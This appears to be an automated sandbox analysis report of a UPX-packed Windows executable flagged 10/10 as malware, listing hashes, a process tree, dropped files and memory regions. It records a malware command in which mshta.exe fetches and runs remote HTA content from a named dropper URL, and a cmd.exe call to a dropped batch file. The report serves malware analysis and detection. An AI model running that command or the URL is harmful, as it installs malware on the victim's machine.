Overview

overview

10

Static

static

7

49d7498e45...ac.exe

windows7-x64

49d7498e45...ac.exe

windows10-2004-x64

Analysis

  • max time kernel
    0s
  • max time network
    15s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/01/2024, 21:40

Sharing

Copy URL Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    49d7498e4543027046795d076e47f1ac.exe

  • Size

    668KB

  • MD5

    49d7498e4543027046795d076e47f1ac

  • SHA1

    3ac5d6c0e12332dcd0f984d470cee4ae58385cf1

  • SHA256

    d82645af1a4bc7d48f4ff972c51d1d800c62a0f988b6cdd871d7eba4cd3c0ad1

  • SHA512

    1277783f58d022792f64c299678a30056eb32ec47eebd4f6c75d20ce9b596b4482e9816836b0f8678a7f6c8c480a1e273af3b90a7a3e73e9fd038d72a3ef79f0

  • SSDEEP

    12288:AHlawHGMpk7lZWnIoWbq47TxC1+HK12XsfQJZUM0SsoSmjCbcZRcHPM:AHlnH47leIA4Y1D2XkmZ5dOaCHP

Score
10/10
upx

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://rrrrrreport.com/inst.php?id=skytraf01

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx

Processes

  • C:\Users\Admin\AppData\Local\Temp\49d7498e4543027046795d076e47f1ac.exe
    "C:\Users\Admin\AppData\Local\Temp\49d7498e4543027046795d076e47f1ac.exe"
    1⤵
      PID:3536
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\agtyjkj.bat" "
        2⤵
          PID:3272
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\System32\mshta.exe" http://rrrrrreport.com/inst.php?id=skytraf01
          2⤵
            PID:3656
        • C:\Windows\system32\LogonUI.exe
          "LogonUI.exe" /flags:0x4 /state0:0xa39be055 /state1:0x41c64e6d
          1⤵
            PID:2172

          Network

                MITRE ATT&CK Matrix

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\agtyjkj.bat
                  Filesize

                  234B

                  MD5

                  b317b1a50e4fbd01eec972f1322a5d80

                  SHA1

                  93070d2318e7d6423b9fa66087a656d077581c1d

                  SHA256

                  8bfd9c13a1d1f953079f9d9d6087c78e5d83ebe19bac3efc080d46e4a2c0e59f

                  SHA512

                  9a751ce5e377ebef6886a5d7b5d93ddc90920c60e9e4d0a28196646218b8df387447233abb3d56dfe5a7c1893a0e04005043c9f931ed2f659789ab13b84b5500

                  Download Submit

                • memory/3536-0-0x0000000000400000-0x000000000075E000-memory.dmp

                  Filesize

                  3.4MB

                  Download

                • memory/3536-1-0x0000000000930000-0x0000000000931000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3536-7-0x0000000000400000-0x000000000075E000-memory.dmp

                  Filesize

                  3.4MB

                  Download